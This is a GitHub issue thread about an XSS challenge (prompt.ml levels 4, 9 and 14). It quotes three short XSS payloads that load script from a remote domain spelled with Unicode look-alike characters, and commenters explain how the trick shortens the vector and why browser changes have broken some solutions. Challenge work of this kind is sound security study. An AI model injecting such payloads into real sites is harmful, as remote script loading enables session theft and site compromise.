### ISSUE TITLE
Level 4,9,14 solution not clear

### ISSUE THREAD

**Issue by PrahathessRengasamy** [cure53/XSSChallengeWiki#11]
14: <img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨">
9: <ſcript/ſrc=//⒕₨></ſcript>
4:  //prompt.ml%2f@⒕₨

what do the 14/20.Rs stand for , If they are url to pages what script should they contain for the respective challenges?

**Comment by ohpe** [comment]
They are domains used to host javascript code (try to visit the http://14.rs). 
In the context of the challenge the goal is to save characters and have the shortest vector as possible, so the shortest URL to deliver the payload.

Bonus trick to save characters was to use special unicode chars such as these two:
- __⒕__  https://codepoints.net/U+2495
- __₨__  https://codepoints.net/U+20A8

**Comment by PrahathessRengasamy** [comment]
Great !! 
I am not able to get the solution working for the levels I am not sure why.

**Comment by ohpe** [comment]
Read carefully the solutions, some payloads are valid only in few browsers.
Also the goal is to trigger `prompt(1)`: check if the domains in the solutions are returning the expected js or something different ;)

**Comment by cure53** [comment]
Some of the solution don't work anymore because browsers changed behavior. Especially for Unicode in URLs/domain names/TLDs.

**Comment by sA74n** [comment]
that means now a days browsers dont transform `⒕₨` to `14.Rs` ?
